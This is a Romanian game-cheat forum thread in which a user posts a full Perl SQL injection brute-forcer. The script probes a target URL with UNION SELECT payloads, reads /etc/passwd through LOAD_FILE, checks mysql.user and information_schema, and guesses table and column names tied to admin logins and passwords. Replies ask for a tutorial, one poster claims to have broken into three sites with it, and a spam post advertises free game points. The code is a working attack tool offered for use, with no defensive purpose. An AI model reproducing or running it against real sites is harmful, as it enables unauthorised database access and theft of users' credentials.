MANGACS TEAM
All for Counter strike 1.6 and more WWW.MANGACS.3XFORUM.RO WWW.MANGACS.3XFORUM.RO WWW.MANGACS.3XFORUM.RO WWW.MANGACS.3XFORUM.RO FREE DOWNLOAD - Filme noi 2016 filme noi filme comedie filme horror filme de groaza filme aventura filme actiune filme desene animate download filme gratis filme noi , filme thriller , filme gratis , jocuri full download , jocuri gratis , jocuri full , muzica noua , muzica romaneasca , hacking , torrent , jocuri free download , free download cfg silent aim ,dll , aimbot for counter strike 1.6 free download, scripts aim , eac , voiplay , Vac : WWW.MANGACS.3XFORUM.RO WWW.MANGACS.3XFORUM.RO FREE DOWNLOAD Cheat counter strike eac3 vac3 aimbot dll yahoo facebook hack aegiss
Lista Forumurilor Pe Tematici
MANGACS TEAM | Reguli | Inregistrare | Login

POZE MANGACS TEAM

Nu sunteti logat.
Nou pe simpatie:
dannutzza
Femeie
25 ani
Mehedinti
cauta Barbat
25 - 52 ani
MANGACS TEAM / Hacking Tools / SQL Injection bruteforcer Moderat de dIeZz # 1337
Autor
Mesaj Pagini: 1
Hacker.hLs
Pe lista neagra

Inregistrat: acum 13 ani
Postari: 298


Code:

#!/usr/bin/perluse LWP::Simple;
if(!$ARGV[2])
{
print "\n\n[+] SQL Injection bruteforce By Bl4k3 -[+]-\n=========================================";
print "\n\nUse: perl $0 [WEBSITE] [COLUMNS] [FILE] [COMMENT] [-T] [-C] [-NOCHECK]\n";
print "\n[WEBSITE]: http://www.web.com/index.php?id=\n[COLUMNS]: Limit of columns to check\n[FILE]: File where save the results\n[COMMENT]: '/*' o '--' (Without '') (Optional)\n[-T]: Try to brute force tables (Optional)\n[-C]: Try to brute force columns (Optional)\n[-NOCHECK]: Skip the initial check (Optional)\n\n";
exit (0);
}
@nombretabla=('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
'name','names','nombre','nombres','usuarios','member','members','admin_table',
'miembro','miembros','membername','admins','administrator',
'administrators','passwd','password','passwords','pass','Pass',
'tAdmin','tadmin','user_password','user_passwords','user_name','user_names',
'member_password','mods','mod','moderators','moderator','user_email',
'user_emails','user_mail','user_mails','mail','emails','email','address',
'e-mail','emailaddress','correo','correos','phpbb_users','log','logins',
'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador',
'tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',
'sistema_usuario','sistema_password','contrasena','auth','key','senha',
'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member',
'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization',
'membros','utilizadores','staff','nuke_authors','accounts','account','accnts',
'associated','accnt','customers','customer','membres','administrateur','utilisateur',
'tuser','tusers','utilisateurs','password','amministratore','god','God','authors',
'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members',
'Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
@nombrecolumna=('admin_name','log_utenti','cla_adm','usu_adm', 'sanleo','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author',
'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');
if ( $ARGV[0] !~ /^http:/ )
{
$ARGV[0] = "http://" . $ARGV[0];
}
if ($ARGV[3] =~ "--" || $ARGV[4] =~ "--" || $ARGV[5] =~ "--" || $ARGV[6] =~ "--")
{
$cmn.= "+";
$cfin.="--";
print "\n[+] Comments to use: '--' & '+'";
}
else
{
$cmn.= "/**/";
$cfin.= "/*";
print "\n[+] Comments to use: '/*' & '/**/'";
}
open(WEB,">>".$ARGV[2]) || die "\n\n[-] Failed creating the file\n";
if ($ARGV[3] =~ "-NOCHECK" || $ARGV[4] =~ "-NOCHECK" || $ARGV[5] =~ "-NOCHECK" || $ARGV[6] =~ "-NOCHECK")
{
print "\n[!] Skipping the initial check...\n";
print WEB "[WEBSITE]:\n\n$ARGV[0]\n";
}
else
{
print "\n[!] Checking if the website is vulnerable...\n";
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cfin;
$response=get($sql)or die("[-] Wrong Website, check it\n");
if($response=~ /mysql_fetch_/ || $response=~ /You have an error in your SQL syntax/ || $response =~ /tem um erro de sintaxe no seu SQL/ || $response =~ /mysql_num_rows/ || $response =~ /Division by zero in/ || $response =~ /SELECT * FROM/ || $response =~/ / || $response =~ /Mysql Error/ || $response =~ /Mysql Error./ || $response =~ /Incorrect syntax near/ || $response =~ /[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect/ || $response =~ /Microsoft OLE DB Provider for SQL Server/)
{
print "[+] Vulnerable website, script continues...\n";
print WEB "[WEBSITE]:\n\n$ARGV[0]\n";
}
else
{
print "[-] Website apparently not vulnerable to SQL Inyection, try another comment\n\n";
exit(1);
}
}
print "\n[!] Looking up columns...\n";
for ($column = 0 ; $column < $ARGV[1] ; $column ++)
{
$union.=','.$column;
$inyection.=','."0x6c6f67696e70776e7a";
if ($column == 0)
{
print WEB "\n[COLUMNS]:\n\n";
$inyection = '';
$union = '';
}
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin;
$response=get($sql)or die("[-] Failed to try to find the number of columns, check website\n");
if($response =~ /loginpwnz/)
{
$column ++;
print "[+] The site has $column columns\n\n";
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
print "$sql\n";
print WEB "$sql\n";
print "\n[!] Checking if Information_Schema exists...";
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;
$response=get($sql)or die("[-] Impossible to get Information_Schema\n");
if($response =~ /loginpwnz/)
{
print "\n[+] Information_Schema available...saving in $ARGV[2]";
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin;
print WEB "\n\n[INFORMATION_SCHEMA]:\n\n$sql\n";
}
else
{
print "\n[-] Information_Schema unavailable";
}
print "\n[!] Checking if MySQL.User exists...";
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."mysql.user".$cfin;
$response=get($sql)or die("[-] Impossible to get MySQL.User\n");
if($response =~ /loginpwnz/)
{
print "\n[+] MySQL.User available...saving in $ARGV[2]";
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin;
print WEB "\n\n[MYSQL.USER]:\n\n$sql\n";
}
else
{
print "\n[-] MySQL.User unavailable";
}
while ($loadcont < $column-1)
{
$loadfile.=','.'load_file(0x2f6574632f706173737764)';
$loadcont++;
}
print "\n[!] Checking if it is possible to inject LOAD_FILE...";
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin;
$response=get($sql)or die("[-] Imposible inyectar LOAD_FILE\n");
if($response =~ /root:x:/)
{
print "\n[+] LOAD_FILE available...saving in $ARGV[2]";
print WEB "\n\n[LOAD_FILE]:\n\nload_file(0x2f6574632f706173737764) => OK! (0x2f6574632f706173737764 => /etc/passwd)\n";
}
else
{
print "\n[-] LOAD_FILE unavailable";
}
if ($ARGV[3] =~ "-T" || $ARGV[4] =~ "-T" || $ARGV[5] =~ "-T" || $ARGV[6] =~ "-T")
{
print "\n\n[!] Brute forcing tables...";
print WEB "\n\n[TABLES]:\n\n";
foreach $tabla(@nombretabla)
{
chomp($tabla);
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin;
$response=get($sql)or die("[-] Impossible to get tables\n");
if($response =~ /loginpwnz/)
{
print "\n[+] Table $tabla exists...saving in $ARGV[2]";
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn.$tabla.$cfin;
print WEB "$sql\n";
}
}
}
if ($ARGV[3] =~ "-C" || $ARGV[4] =~ "-C" || $ARGV[5] =~ "-C" || $ARGV[6] =~ "-C")
{
print "\n\n[!] Table to brute force columns: ";
$tabla.='';
chomp($tabla);
print WEB "\n\n[COLUMNS IN TABLE $tabla]:\n\n";
foreach $columna(@nombrecolumna)
{
chomp($columna);
$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin;
$response=get($sql)or die("[-] Impossible to get columns\n");
if ($response =~ /loginpwnz/)
{
print "\n[+] Column $columna available...saving in $ARGV[2]";
print WEB "$columna\n";
}
}
}
print WEB "\n\n\n[*EOF*]";
print "\n\n[+] Everything saved correctly in $ARGV[2]\n\n";
print "## c0ded by Bl4k3 | 2010 ##\n\n";
exit (0);
}
}
print "[-] Impossible to find number of columns, try more columns\n\n";
print "## c0ded by hLs , WyattLW | 2010 ##\n\n";
exit (0);



pus acum 12 ani
   
C++ HACKED
Spammer

Inregistrat: acum 12 ani
Postari: 5
Merge Cod-u am spart 3 situri   

pus acum 12 ani
   
gabi_123456
Pe lista neagra

Inregistrat: acum 13 ani
Postari: 285
Un tutorial please?

pus acum 12 ani
   
BauBau97
Mng-Team

Inregistrat: acum 13 ani
Postari: 559
la ce te ajuta?

pus acum 12 ani
   
Atacator
Mng-Team

Din: 404 Not Found !
Inregistrat: acum 14 ani
Postari: 520
Tutorialll plS

_______________________________________


pus acum 12 ani
   
sLaYz0R
Spammer

Inregistrat: acum 14 ani
Postari: 3
Post facut la misto, pentru un asemenea program trebuie facut un tutorial, daca vine unu nou se uita la el ca la felu 4 !!

pus acum 12 ani
   
Eddie
Pe lista neagra

Inregistrat: acum 12 ani
Postari: 272
Tutorial pentru oamenii curiosi nu pui?

Nu toti stiu sa umble cu asa ceva, deci pentru curiozitatea persoanelor de mai sus si celor care vad acest topic, posteaza un tutorial, scris, imagini sau videoclip.


pus acum 12 ani
   
Hacker.hLs
Pe lista neagra

Inregistrat: acum 13 ani
Postari: 298
Cei care stiu bafta lor cei care nu stiu nu trb sa umble cu asa ceva acest brute force e un program serios care poti sparge usor o parola care nu stie astai viata invatati

pus acum 12 ani
   
gabi_123456
Pe lista neagra

Inregistrat: acum 13 ani
Postari: 285
Da site,mr,de unde sa invatam daca esti asa destept.

pus acum 12 ani
   
Atacator
Mng-Team

Din: 404 Not Found !
Inregistrat: acum 14 ani
Postari: 520
Hls ) copil de 10 anii sterge dracu porcaria asta daca nu ai tutorial 

_______________________________________


pus acum 12 ani
   
Hacker.hLs
Pe lista neagra

Inregistrat: acum 13 ani
Postari: 298
Atacator taci poate te pun in genunchi   

pus acum 12 ani
   
2012FM
Spammer

Din: Barlad
Inregistrat: acum 12 ani
Postari: 15
daca ai spune si cu ce se compileaza ti-as multumi si eu , macar atat.

_______________________________________


pus acum 11 ani
   
enido
Pe lista neagra

Inregistrat: acum 11 ani
Postari: 135
Foarte bun! 

pus acum 11 ani
   
barados100
Pe lista neagra

Inregistrat: acum 12 ani
Postari: 252
) Foarte bun?!
spammer   cred ca te uiti la ce e acolo ca la felul 4 )
opreste-te din spam


pus acum 11 ani
   
enido
Pe lista neagra

Inregistrat: acum 11 ani
Postari: 135
Na mă desteptilor... Cum il folositi.......                                                                Copiati tot si băgati in cmd... Si gata.

pus acum 11 ani
   
lesbianuL
Spammer

Inregistrat: acum 12 ani
Postari: 2
Sweet! I've just received my free Riot Points!

>> FreeRiotPoints.me <<


pus acum 11 ani
   
0cx01
Spammer

Inregistrat: acum 11 ani
Postari: 25
@enido sa cad pe jos de ras nu de alta 

_______________________________________


pus acum 11 ani
   
Del1ric
Pe lista neagra

Inregistrat: acum 12 ani
Postari: 2603

enido a scris:

Na mă desteptilor... Cum il folositi.......                                                                Copiati tot si băgati in cmd... Si gata.



Functioneaza doar pe Linux. Acolo nu e chiar cmd.


pus acum 11 ani
   
Pagini: 1  

Mergi la